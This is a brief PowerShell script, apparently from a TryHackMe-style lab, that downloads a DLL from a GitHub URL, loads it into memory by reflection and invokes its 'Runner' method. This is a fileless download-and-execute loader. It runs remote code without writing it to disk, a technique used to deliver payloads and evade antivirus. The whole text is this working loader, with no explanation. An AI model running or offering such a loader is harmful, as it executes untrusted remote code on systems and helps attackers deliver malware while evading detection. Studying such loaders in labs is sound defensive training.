$data = (New-Object System.Net.WebClient).DownloadData('https://github.com/P4BNS/THM/raw/main/ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType('ClassLibrary1.Class1')
$method = $class.GetMethod('Runner')
$method.Invoke(0, $null)